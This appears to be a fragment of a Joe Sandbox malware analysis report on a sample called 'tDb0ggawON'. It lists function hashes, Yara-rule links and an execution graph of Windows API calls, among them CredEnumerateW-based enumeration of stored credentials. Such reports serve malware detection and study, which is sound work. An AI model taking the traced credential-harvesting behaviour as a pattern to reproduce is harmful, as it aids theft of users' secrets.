                                                                                                                                                    control_flow_graph 3209 8260040-8260068 3210 826006f-82600a6 3209->3210 3211 826006a 3209->3211 3272 82600a8 call 78c2ab8 3210->3272 3273 82600a8 call 78c2a9b 3210->3273 3211->3210 3213 82600ad-82600bb 3214 82600c1-82600f7 3213->3214 3215 82604d8-82604e1 3213->3215 3217 82601f4-826022a 3214->3217 3218 82600fd-826015d 3214->3218 3221 8260232-8260423 3217->3221 3222 826022c-826022d 3217->3222 3232 82601c2-82601ef 3218->3232 3233 826015f-82601c1 3218->3233 3263 8260425-8260438 3221->3263 3264 826043a-8260448 3221->3264 3224 82604d7 3222->3224 3224->3215 3232->3224 3233->3232 3265 826044b-82604e1 3263->3265 3264->3265 3272->3213 3273->3213
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.520844268.0000000008260000.00000040.00000800.00020000.00000000.sdmp, Offset: 08260000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_8260000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c21840547fbb1b2b91f44267ee1d96c544dff4f0e3fd5840092039a57fa8ab35
                                                                                                                                                    • Instruction ID: ccd22d790656739fbc818205e71a4807057b5e427a5699d58c494016e4ba51ea
                                                                                                                                                    • Opcode Fuzzy Hash: c21840547fbb1b2b91f44267ee1d96c544dff4f0e3fd5840092039a57fa8ab35
                                                                                                                                                    • Instruction Fuzzy Hash: 01D1B174E01228CFDB24DFA4C994BADBBB2BF49304F1485AAC409AB350DB359D86CF41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 082606E9 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.520844268.0000000008260000.00000040.00000800.00020000.00000000.sdmp, Offset: 08260000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_8260000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 38c652d6aab2630c91073a26db7583164899481e6ee687fbe88b60ec45d30c61
                                                                                                                                                    • Instruction ID: 05ef41cb7de6a04dc54de8928c3c6b17d8986adf7c5de87bcd4b98d9e8e08a92
                                                                                                                                                    • Opcode Fuzzy Hash: 38c652d6aab2630c91073a26db7583164899481e6ee687fbe88b60ec45d30c61
                                                                                                                                                    • Instruction Fuzzy Hash: C141AC34E102199FDB08DFA9D984AADBBB2BF49311F149069E405BB360CB34A945DF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 082606F8 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.520844268.0000000008260000.00000040.00000800.00020000.00000000.sdmp, Offset: 08260000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_8260000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ca32955ff00804f6e60e4e8490bc4931c01246ea2f80274fe98b94d3df3f2465
                                                                                                                                                    • Instruction ID: e192713b5914a08403a30f0c12c9b3566c1421318dedb5ea9f4e5e7754d33f38
                                                                                                                                                    • Opcode Fuzzy Hash: ca32955ff00804f6e60e4e8490bc4931c01246ea2f80274fe98b94d3df3f2465
                                                                                                                                                    • Instruction Fuzzy Hash: C4419038E11219DFCB08DFA9D984AADBBB2BF49315F149069E405BB360CB34AD41DF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0118D4D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.517381778.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_118d000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: bc2063255c2830879fc16065b225e98ed773fffa106b952b86eb7dfe77959794
                                                                                                                                                    • Instruction ID: 34d20b7c56079871def32eae6fb7249d2803df5e9a1c05b6cc607b5624772c5a
                                                                                                                                                    • Opcode Fuzzy Hash: bc2063255c2830879fc16065b225e98ed773fffa106b952b86eb7dfe77959794
                                                                                                                                                    • Instruction Fuzzy Hash: 1C21D1715003009FDF09EF98E9C0B56BB65EB88228F24C56AE8050A286C336D845CAA2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0118D4D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.517381778.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_118d000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2121f5706edcd177c129481944ecb66637ed1965ec3e2d800c0afea4c302493a
                                                                                                                                                    • Instruction ID: cfc7e502e37209ef9a0c814b6446161496fdf14f8b5462abbfb53063142c66ea
                                                                                                                                                    • Opcode Fuzzy Hash: 2121f5706edcd177c129481944ecb66637ed1965ec3e2d800c0afea4c302493a
                                                                                                                                                    • Instruction Fuzzy Hash: E0119D76404380DFCF16DF54E9C4B16BF71FB84224F24C6AAD8050A656C33AD45ACFA2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0118D667 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.517381778.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_118d000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8a6664910ace32f931af734740e8a5098ea65acacbf2c37fa7099387f97e2140
                                                                                                                                                    • Instruction ID: c907e79866712f602112d8f4ed5f6eccd998f1bfa2c71a15eb0d359b238492d5
                                                                                                                                                    • Opcode Fuzzy Hash: 8a6664910ace32f931af734740e8a5098ea65acacbf2c37fa7099387f97e2140
                                                                                                                                                    • Instruction Fuzzy Hash: ABF03776200604AF97249F0AD884C27FBA9EBC4634315C45AE9494B712C631EC42CFA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0118D658 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.517381778.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_118d000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d2217fc71ef05545b5064ea0907f22a433750e85e5cfb1b320deffb1029cfca4
                                                                                                                                                    • Instruction ID: 6fcc77901b6838b2dafc4ea51d7401081c5fcb5f10b46c77a9052f7c9ea8088e
                                                                                                                                                    • Opcode Fuzzy Hash: d2217fc71ef05545b5064ea0907f22a433750e85e5cfb1b320deffb1029cfca4
                                                                                                                                                    • Instruction Fuzzy Hash: B5F03C75104780AFD7158F06CD84C63BFF9EB86660719C489E8894B352C631FC46CF61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 08260621 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.520844268.0000000008260000.00000040.00000800.00020000.00000000.sdmp, Offset: 08260000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_8260000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e29c2b1d12cd30258dbd1b1b1ffb55e06792fb4b312ecac5436f4d77936d48fc
                                                                                                                                                    • Instruction ID: 352e1a5ecb3d2b64159d1c2f072b48d70027e2beaf7251ccac330b93a857a334
                                                                                                                                                    • Opcode Fuzzy Hash: e29c2b1d12cd30258dbd1b1b1ffb55e06792fb4b312ecac5436f4d77936d48fc
                                                                                                                                                    • Instruction Fuzzy Hash: B0E06D7091420ADFDB88DF64C50679EBFF0FF05614F2086AEC005EA210E7B10641CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 08260630 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.520844268.0000000008260000.00000040.00000800.00020000.00000000.sdmp, Offset: 08260000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_8260000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a5d350f0c09c1b17f349b0ffa8707445881bf04ddeb44a81d0dccdf8c2b6e7b5
                                                                                                                                                    • Instruction ID: bee0e049b755313163b1caf13b8ea7c61bc454ffaa11802149e5bf16e1edf28d
                                                                                                                                                    • Opcode Fuzzy Hash: a5d350f0c09c1b17f349b0ffa8707445881bf04ddeb44a81d0dccdf8c2b6e7b5
                                                                                                                                                    • Instruction Fuzzy Hash: D9E0ECB0D1430A9FCB80EFA9C94575EBBF0AB04614F208969C015E6241E7B556558F92
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 078CFE8A Relevance: .1, Instructions: 67COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.520560124.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_78c0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 68ac0c75964207a0e52e69533ace1cd29836b9aa2782018a7e573a533b810cca
                                                                                                                                                    • Instruction ID: fe8df34bc7c0b83208bc66b727e0cf44ab8409b61100c758e042f520d13b9765
                                                                                                                                                    • Opcode Fuzzy Hash: 68ac0c75964207a0e52e69533ace1cd29836b9aa2782018a7e573a533b810cca
                                                                                                                                                    • Instruction Fuzzy Hash: 0D2135B5E112199FDB04DFA4D858BEEBBF1EB49304F14446AD500B7391DB784A88CFA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:6.6%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                    Signature Coverage:1.4%
                                                                                                                                                    Total number of Nodes:1574
                                                                                                                                                    Total number of Limit Nodes:54
                                                                                                                                                    execution_graph 37041 422ed5 126 API calls 37043 43eb18 17 API calls 37044 403046 strlen WriteFile 37046 42d04a 112 API calls 37048 41604b 8 API calls 37228 43f1a1 14 API calls 37052 43e851 18 API calls 37230 42aa50 165 API calls 37231 43ee56 15 API calls 37232 43ea5b 168 API calls 37232->37232 37235 411e5f 8 API calls 37058 411c63 9 API calls 37059 412c62 InterlockedCompareExchange InitializeCriticalSection Sleep 37060 43fc60 memset memset 37236 415662 24 API calls 37061 43146a 17 API calls 37063 43e86d 140 API calls 37239 423186 140 API calls 37240 431a71 13 API calls 37241 42fa71 14 API calls 37064 43eb15 14 API calls 37244 41527a 21 API calls 37246 43ea78 12 API calls 37248 43fa7d 143 API calls 37248->37248 37065 415804 86 API calls 37251 40da11 31 API calls 37252 431615 memset memcpy 37067 40a818 18 API calls 37253 411e18 WritePrivateProfileStringW 37070 43e81e 13 API calls 37072 43eb18 15 API calls 37256 415228 LockFile UnlockFile 35422 442628 35441 442838 35422->35441 35424 442634 GetModuleHandleA 35427 442644 __set_app_type __p__fmode __p__commode 35424->35427 35426 4426d8 35428 4426e0 __setusermatherr 35426->35428 35429 4426ec 35426->35429 35427->35426 35428->35429 35442 442824 _controlfp 35429->35442 35431 4426f1 _initterm __wgetmainargs _initterm 35432 442752 GetStartupInfoW 35431->35432 35433 442744 35431->35433 35435 44279a GetModuleHandleA 35432->35435 35443 40e2f1 35435->35443 35439 4427d1 _cexit 35439->35433 35440 4427ca exit 35440->35439 35441->35424 35442->35431 35485 403926 LoadLibraryW 35443->35485 35445 40e305 35477 40e309 35445->35477 35494 4121c3 35445->35494 35448 40e348 35498 40e0ac ??2@YAPAXI 35448->35498 35455 40e393 35530 40aba4 memset 35455->35530 35456 40e3a7 35535 40aa06 memset 35456->35535 35461 40e4bc ??3@YAXPAX 35464 40e4da DeleteObject 35461->35464 35465 40e4ee 35461->35465 35462 40836b _wcsicmp 35463 40e3bd 35462->35463 35463->35461 35468 40e3e3 CoInitialize 35463->35468 35540 40e227 35463->35540 35464->35465 35555 407eb8 free free 35465->35555 35467 40e4ff 35556 402778 35467->35556 35554 40e030 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 35468->35554 35474 40e3f3 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 35478 40e4b6 CoUninitialize 35474->35478 35479 40e448 35474->35479 35477->35439 35477->35440 35478->35461 35480 40e463 TranslateAcceleratorW 35479->35480 35481 40e457 IsDialogMessageW 35479->35481 35482 40e4a8 GetMessageW 35480->35482 35483 40e480 IsDialogMessageW 35480->35483 35481->35480 35481->35482 35482->35478 35482->35479 35483->35482 35484 40e492 TranslateMessage DispatchMessageW 35483->35484 35484->35482 35486 403951 GetProcAddress 35485->35486 35487 403979 #17 35485->35487 35489 403961 35486->35489 35490 40396a FreeLibrary 35486->35490 35488 403982 35487->35488 35491 4039a0 35488->35491 35492 403989 MessageBoxW 35488->35492 35489->35490 35490->35487 35493 403975 35490->35493 35491->35445 35492->35445 35493->35488 35495 40e314 SetErrorMode GetModuleHandleW EnumResourceTypesW 35494->35495 35496 4121cc LoadLibraryW 35494->35496 35495->35448 35496->35495 35497 4121e0 GetProcAddress 35496->35497 35497->35495 35499 40e0da 35498->35499 35500 40e0ec ??2@YAPAXI 35499->35500 35501 40e103 35500->35501 35503 40e108 35500->35503 35568 40ad07 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 35501->35568 35504 40e135 35503->35504 35505 40e128 DeleteObject 35503->35505 35560 40764e 35504->35560 35505->35504 35507 40e13a 35563 401000 35507->35563 35511 40e188 35512 4081ea 35511->35512 35570 407eb8 free free 35512->35570 35514 40833f 35583 408037 35514->35583 35517 408001 malloc memcpy free free 35524 408225 35517->35524 35518 408314 35518->35514 35594 408001 35518->35594 35520 4082b0 free 35520->35524 35524->35514 35524->35517 35524->35518 35524->35520 35571 407ede 35524->35571 35586 407475 35524->35586 35525 407ede 7 API calls 35525->35514 35526 40836b 35527 408392 35526->35527 35528 408373 35526->35528 35527->35455 35527->35456 35528->35527 35529 40837c _wcsicmp 35528->35529 35529->35527 35529->35528 35599 40ab7d 35530->35599 35532 40abd7 GetModuleHandleW 35604 40aa44 35532->35604 35536 40ab7d 3 API calls 35535->35536 35537 40aa36 35536->35537 35677 40a97e 35537->35677 35691 403018 35540->35691 35542 40e241 35543 40e2ea 35542->35543 35544 40e26c _wcsicmp 35542->35544 35546 40e2a3 35542->35546 35721 40e191 7 API calls 35542->35721 35543->35461 35543->35468 35544->35542 35546->35543 35694 40d83c 35546->35694 35548 40e2b1 35707 40cfde 35548->35707 35550 40e2bf 35551 40c5b3 35 API calls 35550->35551 35552 40e2dc 35551->35552 35553 40d9f2 12 API calls 35552->35553 35553->35543 35554->35474 35555->35467 35557 402785 35556->35557 35558 40277e free 35556->35558 35559 407eb8 free free 35557->35559 35558->35557 35559->35477 35569 4075ad memset wcscpy 35560->35569 35562 407665 CreateFontIndirectW 35562->35507 35564 401037 35563->35564 35565 40103b GetModuleHandleW LoadIconW 35564->35565 35566 40100e wcsncat 35564->35566 35567 4016c5 wcscpy 35565->35567 35566->35564 35567->35511 35568->35503 35569->35562 35570->35524 35572 407ef9 35571->35572 35573 407eed wcslen 35571->35573 35574 407f14 free 35572->35574 35575 407f1d 35572->35575 35573->35572 35577 407f27 35574->35577 35576 407475 3 API calls 35575->35576 35576->35577 35578 407f40 35577->35578 35579 407f37 free 35577->35579 35581 407475 3 API calls 35578->35581 35580 407f4c memcpy 35579->35580 35580->35524 35582 407f4b 35581->35582 35582->35580 35584 408047 35583->35584 35585 40803d free 35583->35585 35584->35526 35585->35584 35587 4074c2 35586->35587 35588 40747c malloc 35586->35588 35587->35524 35590 4074b8 35588->35590 35591 40749d 35588->35591 35590->35524 35592 4074b1 free 35591->35592 35593 4074a1 memcpy 35591->35593 35592->35590 35593->35592 35595 40801a 35594->35595 35596 40800f free 35594->35596 35598 407475 3 API calls 35595->35598 35597 408025 35596->35597 35597->35525 35598->35597 35623 40757a GetModuleFileNameW 35599->35623 35601 40ab83 wcsrchr 35602 40ab92 35601->35602 35603 40ab96 wcscat 35601->35603 35602->35603 35603->35532 35624 442a90 35604->35624 35606 40aa51 memset memset 35626 40757a GetModuleFileNameW 35606->35626 35608 40aa9a 35627 441c15 GetFileVersionInfoSizeW 35608->35627 35611 40aad1 wcscpy wcscpy 35654 40a5b6 35611->35654 35612 40aabc wcscpy 35612->35611 35615 40a5b6 3 API calls 35616 40ab10 35615->35616 35617 40a5b6 3 API calls 35616->35617 35618 40ab26 35617->35618 35619 40a5b6 3 API calls 35618->35619 35620 40ab39 EnumResourceNamesW EnumResourceNamesW wcscpy 35619->35620 35660 40a91d 35620->35660 35623->35601 35625 442a97 35624->35625 35625->35606 35625->35625 35626->35608 35628 40aab8 35627->35628 35629 441c3b 35627->35629 35628->35611 35628->35612 35630 441c43 ??2@YAPAXI GetFileVersionInfoW VerQueryValueW 35629->35630 35631 441c72 35630->35631 35632 441c98 VerQueryValueW 35630->35632 35631->35632 35633 441ce7 wcscpy 35632->35633 35634 441caf _snwprintf 35632->35634 35635 441cf7 35633->35635 35667 441b86 9 API calls 35634->35667 35668 441b86 9 API calls 35635->35668 35638 441ce3 35638->35633 35638->35635 35639 441d09 35669 441b86 9 API calls 35639->35669 35641 441d1e 35670 441b86 9 API calls 35641->35670 35643 441d33 35671 441b86 9 API calls 35643->35671 35645 441d48 35672 441b86 9 API calls 35645->35672 35647 441d5d 35673 441b86 9 API calls 35647->35673 35649 441d72 35674 441b86 9 API calls 35649->35674 35651 441d87 35675 441b86 9 API calls 35651->35675 35653 441d9c ??3@YAXPAX 35653->35628 35655 442a90 35654->35655 35656 40a5c3 memset GetPrivateProfileStringW 35655->35656 35657 40a613 35656->35657 35658 40a61d WritePrivateProfileStringW 35656->35658 35657->35658 35659 40a619 35657->35659 35658->35659 35659->35615 35661 442a90 35660->35661 35662 40a92a memset 35661->35662 35663 40a949 LoadStringW 35662->35663 35664 40a963 35663->35664 35664->35663 35666 40a97b 35664->35666 35676 40a62f memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 35664->35676 35666->35461 35667->35638 35668->35639 35669->35641 35670->35643 35671->35645 35672->35647 35673->35649 35674->35651 35675->35653 35676->35664 35687 407548 GetFileAttributesW 35677->35687 35679 40a987 35680 40aa00 35679->35680 35681 40a98c wcscpy wcscpy GetPrivateProfileIntW 35679->35681 35680->35462 35688 40a51e GetPrivateProfileStringW 35681->35688 35683 40a9db 35689 40a51e GetPrivateProfileStringW 35683->35689 35685 40a9ec 35690 40a51e GetPrivateProfileStringW 35685->35690 35687->35679 35688->35683 35689->35685 35690->35680 35722 40afda 35691->35722 35695 40d904 35694->35695 35696 40d858 memset 35694->35696 35695->35548 35762 40757a GetModuleFileNameW 35696->35762 35698 40d87d wcsrchr 35699 40d892 35698->35699 35700 40d895 wcscat 35698->35700 35699->35700 35763 411db2 wcscpy wcscpy wcscpy CreateFileW CloseHandle 35700->35763 35702 40d8db 35764 4017b7 GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 35702->35764 35704 40d8f3 35765 40aeee SendMessageW memset SendMessageW 35704->35765 35706 40d903 35706->35695 35708 40d040 35707->35708 35713 40cff2 35707->35713 35766 407098 LoadCursorW SetCursor 35708->35766 35710 40d045 35767 40320a 35710->35767 35783 44233c 35710->35783 35711 40cff9 _wcsicmp 35711->35713 35712 40d059 35714 40836b _wcsicmp 35712->35714 35713->35708 35713->35711 35786 40cbc1 10 API calls 35713->35786 35717 40d069 35714->35717 35715 40d0b1 35717->35715 35718 40d0a8 qsort 35717->35718 35718->35715 35721->35542 35723 40afeb 35722->35723 35735 40adbb 35723->35735 35726 40b047 memcpy memcpy 35727 40b092 35726->35727 35727->35726 35728 40b0cd ??2@YAPAXI ??2@YAPAXI 35727->35728 35729 409ff5 16 API calls 35727->35729 35730 40b109 ??2@YAPAXI 35728->35730 35732 40b140 35728->35732 35729->35727 35730->35732 35745 40af5a 35732->35745 35734 403027 35734->35542 35736 40adc6 ??3@YAXPAX 35735->35736 35737 40adcd 35735->35737 35736->35737 35738 40add4 ??3@YAXPAX 35737->35738 35739 40addb 35737->35739 35738->35739 35740 40ade5 ??3@YAXPAX 35739->35740 35741 40adec 35739->35741 35740->35741 35742 40ae0c ??2@YAPAXI ??2@YAPAXI 35741->35742 35743 40ae05 ??3@YAXPAX 35741->35743 35744 40adfc ??3@YAXPAX 35741->35744 35742->35726 35743->35742 35744->35743 35746 408037 free 35745->35746 35747 40af63 35746->35747 35748 408037 free 35747->35748 35749 40af6b 35748->35749 35750 408037 free 35749->35750 35751 40af73 35750->35751 35752 408037 free 35751->35752 35753 40af7b 35752->35753 35754 408001 4 API calls 35753->35754 35755 40af8e 35754->35755 35756 408001 4 API calls 35755->35756 35757 40af98 35756->35757 35758 408001 4 API calls 35757->35758 35759 40afa2 35758->35759 35760 408001 4 API calls 35759->35760 35761 40afac 35760->35761 35761->35734 35762->35698 35763->35702 35764->35704 35765->35706 35766->35710 35768 40321a 35767->35768 35769 402778 free 35768->35769 35770 40326c 35769->35770 35787 410168 35770->35787 35774 4033cc 35775 402778 free 35774->35775 35776 4033d8 35775->35776 35776->35712 35777 4032fc memset memcpy 35778 403338 wcscmp 35777->35778 35779 403292 35777->35779 35778->35779 35779->35774 35779->35777 35779->35778 35879 402b99 11 API calls 35779->35879 35880 40b90d 6 API calls 35779->35880 35781 40336d _wcsicmp 35781->35779 35784 44234c FreeLibrary 35783->35784 35785 44236b 35783->35785 35784->35785 35785->35712 35786->35713 35788 410175 35787->35788 35789 4101b1 35788->35789 35881 409a34 35788->35881 35791 4101c0 memset 35789->35791 35796 410253 35789->35796 35956 40ed6c 35791->35956 35794 410396 memset memset memset 35798 4103f2 35794->35798 35799 410424 35794->35799 35854 410385 35796->35854 35997 40f0d5 memset memset memset memset memset 35796->35997 35798->35799 35803 4103fd 35798->35803 36042 412270 35799->36042 35801 4104e5 memset 36067 401b06 memset 35801->36067 35802 40328b 35878 40ff51 8 API calls 35802->35878 36081 407447 wcslen 35803->36081 35808 41054d memset memset 35814 412270 10 API calls 35808->35814 35810 4101a5 35943 44236d 35810->35943 35813 4101fd 35822 41023d 35813->35822 35824 410255 35813->35824 35821 410590 wcslen wcslen 35814->35821 35815 41040e 36084 410075 memset wcslen wcslen 35815->36084 35817 41046e 36058 410000 35817->36058 35818 410457 36099 4076a9 wcslen wcscat wcscpy wcscat 35818->36099 35819 41050c 35819->35802 35819->35808 35852 410543 35819->35852 35830 4105b2 35821->35830 35831 4105c9 35821->35831 36075 406dd9 131 API calls 35822->36075 35969 40f2e6 memset memset memset memset memset 35824->35969 35828 410315 ExpandEnvironmentStringsW 36032 4063c1 memset wcslen wcslen 35828->36032 36101 4076a9 wcslen wcscat wcscpy wcscat 35830->36101 36102 407548 GetFileAttributesW 35831->36102 35833 41041a 35833->35801 35833->35819 35834 410671 35834->35802 35840 410310 35840->35828 35859 41033a 35840->35859 35841 4104c2 35849 410000 189 API calls 35841->35849 35842 4104ab 36100 4076a9 wcslen wcscat wcscpy wcscat 35842->36100 35845 41033e 36080 407eb8 free free 35845->36080 35846 4105e0 35851 4105f5 wcslen wcslen 35846->35851 35846->35852 35847 410294 36077 407eb8 free free 35847->36077 35849->35833 35855 410632 35851->35855 35856 41061b 35851->35856 36105 4421eb 23 API calls 35852->36105 35853 410263 35853->35847 36076 406dd9 131 API calls 35853->36076 35854->35794 35854->35833 36104 407548 GetFileAttributesW 35855->36104 36103 4076a9 wcslen wcscat wcscpy wcscat 35856->36103 35859->35845 36079 406dd9 131 API calls 35859->36079 35862 410649 35862->35852 35863 410676 memset wcslen wcslen 35862->35863 35864 4106cf 35863->35864 35865 4106b8 35863->35865 36107 4083e1 35864->36107 36106 4076a9 wcslen wcscat wcscpy wcscat 35865->36106 35869 410798 36133 4084da 35869->36133 35872 410719 wcslen wcslen 35873 410708 35872->35873 35873->35869 35873->35872 35876 410772 35873->35876 36115 40839d 35873->36115 36120 4076a9 wcslen wcscat wcscpy wcscat 35873->36120 36121 407548 GetFileAttributesW 35873->36121 36123 408441 35873->36123 36122 4421eb 23 API calls 35876->36122 35878->35779 35879->35781 35880->35779 35882 409a41 35881->35882 36136 407eb8 free free 35882->36136 35884 409a54 36137 407eb8 free free 35884->36137 35886 409a5c 36138 407eb8 free free 35886->36138 35888 409a64 35889 408037 free 35888->35889 35890 409a6c 35889->35890 36139 409508 memset 35890->36139 35895 407f88 9 API calls 35896 409a8f 35895->35896 35897 407f88 9 API calls 35896->35897 35898 409a9c 35897->35898 36168 409657 35898->36168 35902 409b5a 35911 408619 35902->35911 35903 409b52 35904 4038c4 7 API calls 35903->35904 35904->35902 35909 409aaa 35909->35902 35909->35903 35910 4098c2 18 API calls 35909->35910 36191 407de0 35909->36191 35910->35909 36345 4037c3 35911->36345 35914 408648 CredEnumerateW 35916 408657 35914->35916 35918 408661 wcslen 35916->35918 35920 4087ec 35916->35920 35919 408690 35918->35919 35918->35920 35919->35920 35921 408698 wcsncmp 35919->35921 35924 4086d7 35919->35924 36353 40383e 35920->36353 35921->35919 35923 408711 memset 35923->35924 35925 40873b memcpy 35923->35925 35924->35919 35924->35923 35924->35925 36356 403853 LoadLibraryW GetProcAddress FreeLibrary 35924->36356 35926 4087a0 wcschr 35925->35926 35927 408783 _wcsnicmp 35925->35927 35928 408797 35926->35928 35927->35926 35927->35928 35928->35926 35929 4087d2 LocalFree 35928->35929 35929->35919 35930 409eb8 36357 4117e3 35930->36357 35933 409f14 35936 4117e3 FreeLibrary 35933->35936 35934 409ed6 GetProcAddress 35934->35933 35935 409ef0 35934->35935 35935->35933 35938 409f00 35935->35938 35937 409f19 35936->35937 35937->35810 36360 41184f CoTaskMemFree 35938->36360 35940 409f0c 35941 4117e3 FreeLibrary 35940->35941 35942 411817 35941->35942 35942->35810 36361 4422c7 35943->36361 35945 4424fb 35945->35789 35947 4422c7 8 API calls 35948 4423b3 35947->35948 35949 4424e7 35948->35949 35955 4423ff 35948->35955 36364 44225b memcmp 35948->36364 35950 4422c7 8 API calls 35949->35950 35950->35945 35952 4424da 35953 4422c7 8 API calls 35952->35953 35953->35949 35954 4422c7 8 API calls 35954->35955 35955->35952 35955->35954 35957 40ed81 35956->35957 36365 40edfa 35957->36365 35960 40ed98 35966 40edd8 35960->35966 36379 40797a CreateFileW GetFileTime CloseHandle 35960->36379 35961 40edee 36378 407eb8 free free 35961->36378 35963 40edf6 wcsrchr 35963->35813 35965 40edae CompareFileTime 35965->35960 35966->35961 35967 407447 2 API calls 35966->35967 35968 40eded 35967->35968 35968->35961 35970 412270 10 API calls 35969->35970 35971 40f370 35970->35971 35972 412270 10 API calls 35971->35972 35973 40f37e wcslen wcslen 35972->35973 35974 40f3bc wcslen wcslen 35973->35974 35975 40f3a5 35973->35975 35978 40f403 wcslen wcslen 35974->35978 35979 40f3ec 35974->35979 36427 4076a9 wcslen wcscat wcscpy wcscat 35975->36427 35982 40f433 